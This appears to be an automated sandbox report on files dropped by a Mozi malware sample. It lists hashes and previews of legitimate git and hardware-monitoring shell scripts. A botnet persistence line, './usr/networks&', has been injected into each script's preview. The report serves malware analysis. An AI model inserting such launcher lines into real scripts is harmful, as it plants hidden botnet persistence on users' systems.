                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:awk or perl script, ASCII text
                                                              Category:dropped
                                                              Size (bytes):1829
                                                              Entropy (8bit):4.38604786798686
                                                              Encrypted:false
                                                              SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                              MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                              SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                              SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                              SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):253
                                                              Entropy (8bit):5.267626424494032
                                                              Encrypted:false
                                                              SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                              MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                              SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                              SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                              SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 2.fi.SO=/tmp/expect-read1.$$.so.rm -f $SO.CMD="${CC_FOR_TARGET:-gcc} -o $SO -Wall -fPIC -shared $C".if ! $CMD; then. echo >&2 "$0: Failed: $CMD". exit 2.fi.trap "rm -f $SO" EXIT.LD_PRELOAD=$SO expect "$@"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2988
                                                              Entropy (8bit):4.924425870820004
                                                              Encrypted:false
                                                              SSDEEP:48:II63+FOMuldvJM+6/4p20SdvgT3vtBug0hoAYXy39qbFcxZ+6N77DoXf0iqUckOM:Le+8RldvJjTEvgTftcoAYXY9q6o6N/Ds
                                                              MD5:7E1F6356EC1ED5353F164A90853F050A
                                                              SHA1:AEBF6C04E3737D1E1172965E25DB372841DD6550
                                                              SHA-256:CE3B6AE4E92DA2F30AD1E09DCFA849B2744524D62B9AA9440BA76BEDCA46EE69
                                                              SHA-512:CCF50021CA3905B5B61C6A2E6D516E21CADEF175D9CD64FD2630E5B185CAE7FF142E8F1793E484981F91F4EEF6C3E053F4D0FD6E9F1F2F9ACFF3B56FB163368E
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.fi..file="$1"..if test ! -r "$file"; then. echo "$myname: unable to access: $file" 1>&2. exit 1.fi..dir="${file%/*}".test "$dir" = "$file" && dir="."..dwz_file="".if $READELF -S "$file" | grep -q " \.gnu_debugaltlink "; then. dwz_file=$($READELF --string-dump=.gnu_debugaltlink "$file" \... | grep -A1 "'\.gnu_debugaltlink':" \... | tail -n +2 \... | sed 's/.*]//'). dwz_file=$(echo $dwz_file). if $READELF -S "$dwz_file" | grep -E -q " \.(gdb_index|debug_names) "; then..# Already has an index, skip it...dwz_file="". fi.fi..set_files ().{. local file="$1".. index4="${file}.gdb-index". index5="${file}.debug_names". debugstr="${file}.debug_str". debugstrmerge="${file}.debug_str.merge". debugstrerr="${file}.debug_str.err".}..tmp_files=.for f in "$file" "$dwz_file"; do. if [ "$f" = "" ]; then..continue. fi. set_files "$f". tmp_files="$tmp_files $index4 $index5 $debugstr $debugstrmerge $debugstrerr".done..rm -f $t
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):486
                                                              Entropy (8bit):5.198694046664742
                                                              Encrypted:false
                                                              SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                              MD5:84511195A8532AFAED8B6E6645B72FC9
                                                              SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                              SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                              SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2904
                                                              Entropy (8bit):5.006955417229927
                                                              Encrypted:false
                                                              SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                              MD5:E6A74480E370B07D5BDC026A624CE684
                                                              SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                              SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                              SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                              Malicious:false
                                                              Preview:./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1246
                                                              Entropy (8bit):5.049599407603353
                                                              Encrypted:false
                                                              SSDEEP:24:MASp8NltrBrTf+mAka+mq8bTNRzbm4XaR3U0Lp0VDbztR5OjPKITbfrCnMSg:MAtltd3dAkad3RzK4Xahjd0VDbZfWDb5
                                                              MD5:7D6CF34C9799D8C55311F08D93A10138
                                                              SHA1:A84010E0348E5047DF290518012FC67F16FDE381
                                                              SHA-256:866FDA21F32F6B7DF370F774EE54E025C366EB13344FEB4171D8B2C7E71390AB
                                                              SHA-512:9BAF68D66C557B79CEEBD37408E718DCAB9B24DA99D064896200891F56D16A0770F68C202EA169596A319EDAD2CBCD0F7F2CB93A07D20C11D4058F97D733C778
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 0...;;..-o|--overwrite)...overwrite=1...shift...break...;;..--)...shift...break...;;..*)...break...;;..esac.done..# Overwrite or help options are not valid except as first arg.for opt in "$@".do..case "$opt" in..-h|--help)...echo "$USAGE"...exit 0...;;..-o|--overwrite)...echo "$USAGE"...exit 0...;;..esac.done... "$(git --exec-path)/git-sh-setup".require_work_tree.cd_to_toplevel..# Remember original branch.branch=$(git symbolic-ref -q HEAD) ||.original_HEAD=$(git rev-parse --verify HEAD) || {..echo >&2 "Not on any branch and no commit yet?"..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test $overwrite = 1..then...git rerere forget ...fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):16426
                                                              Entropy (8bit):5.045058479498928
                                                              Encrypted:false
                                                              SSDEEP:384:j0fwqnEt0mOR+eFCnerWvDL7gfpv6bck6pYT2t9+WYtrV1achgV3fD0CzIy2FfCr:j0fwqny0mOo8CnerWvH7ghSbckVT2t9n
                                                              MD5:5FF7690E1044D6F67F7B8D809103162D
                                                              SHA1:CC0197BA40420DCA0D68647648C2762C1BEF1A16
                                                              SHA-256:5376C3978C0680B83294F2DBF1341C197B8BCC69A8691413FE8E6F493B5A8380
                                                              SHA-512:827DA60BFED3EF33E4A24175AD3EB6B58E623B468369C35D5864B407C3F1D0655C942877C997A97D9768EA87B68138D047A4965F1FC66380988BF1A748B5987F
                                                              Malicious:false
                                                              Preview:./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug () {..if test -n "$debug"..then...printf "%s\n" "$*" >&2..fi.}..say () {..if test -z "$quiet"..then...printf "%s\n" "$*" >&2..fi.}..progress () {..if test -z "$quiet"..then...printf "%s\r" "$*" >&2..fi.}..assert () {..if ! "$@"..then...die "assertion failed: " "$@"..fi.}..ensure_single_rev () {..if test $# -ne 1..then...die "You must provide exactly one revision. Got: '$@'"..fi.}..while test $# -gt 0.do..opt="$1"..shift...case "$opt" in..-q)...quiet=1...;;..-d)...debug=1...;;..--annotate)...annotate="$1"...shift...;;..--no-annotate)...annotate=...;;..-b)...branch="$1"...shift...;;..-P)...prefix="${1%/}"...shift...;;..-m)...message="$1"...shift...;;..--no-prefix)...prefix=...;;..--onto)...onto="$1"...shift...;;..--no-onto)...ont
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):823
                                                              Entropy (8bit):5.445793673200752
                                                              Encrypted:false
                                                              SSDEEP:12:w6vCJsHKfrLCYwTlFfOfSL3DXKUvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+uKKGRBmAF5I0Zl7
                                                              MD5:4180AD5F33CADD1650F75A8BBC430E64
                                                              SHA1:E47B7FB6D9AF677D61D983920D8CE0AC76A13DEF
                                                              SHA-256:3DFF00AAF13758FABB9C97B4E9D26967211B44971056A6BEE5DC0DC04050715F
                                                              SHA-512:7AB4417B9878A6122942C277D84A5BA1A286819853952614FFE4A9ACEEB00CBFE336AD4EE39946517E430A6C1E415486119733D6C58AD9BA22448CEC9E4766B6
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=$(echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp')..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):8722
                                                              Entropy (8bit):4.841397056972939
                                                              Encrypted:false
                                                              SSDEEP:192:/i038ZMHCJtcyzyBgVQlyzcvXGC7tq5bM7YKBKjI7YYI:ZCbdHVQ+ceJE7+
                                                              MD5:1C808D280E8DF536EFBE3AB9EC6A1AE4
                                                              SHA1:28B08E23FC817DF4A67AD544B8D56F6947AB2A56
                                                              SHA-256:706BDD06879A99096A874915BB81A179F3455DC1B29C2F01C54DB26197B05786
                                                              SHA-512:1EDD029A4300324FF3D9E458B2F054F5D60231BA3E4EF374F5F20A11117E0DD4EC3AC3FDBB1AAF38800562E67BC473FDF66E2485350C8CB5565A3048FD91E2A5
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.}..cd "$(dirname "$0")"/../.. ||.die "Could not cd to top-level directory"..mkdir -p .vscode ||.die "Could not create .vscode/"..# General settings..cat >.vscode/settings.json.new <<\EOF ||.{. "C_Cpp.intelliSenseEngine": "Default",. "C_Cpp.intelliSenseEngineFallback": "Disabled",. "[git-commit]": {. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 72. },. "[c]": {. "editor.detectIndentation": false,. "editor.insertSpaces": false,. "editor.tabSize": 8,. "editor.wordWrap": "wordWrapColumn",. "editor.wordWrapColumn": 80,. "files.trimTrailingWhitespace": true. },. "files.associations": {. "*.h": "c",. "*.c": "c". },. "cSpell.ignorePaths": [. ],. "cSpell.words": [. "DATAW",. "DBCACHED",. "DFCHECK",. "DTYPE",. "Hamano",. "HCAST",. "HEXSZ",. "HKEY",. "HKLM",. "IFGITLINK",. "IFIN
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):617
                                                              Entropy (8bit):4.789300168717738
                                                              Encrypted:false
                                                              SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                              MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                              SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                              SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                              SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):1015
                                                              Entropy (8bit):4.896629241453442
                                                              Encrypted:false
                                                              SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                              MD5:87F1604CDCC54749A6A6D814FBB28530
                                                              SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                              SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                              SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):266
                                                              Entropy (8bit):4.736279036741599
                                                              Encrypted:false
                                                              SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                              MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                              SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                              SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                              SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2712
                                                              Entropy (8bit):5.4524991837552035
                                                              Encrypted:false
                                                              SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                              MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                              SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                              SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                              SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                              Malicious:false
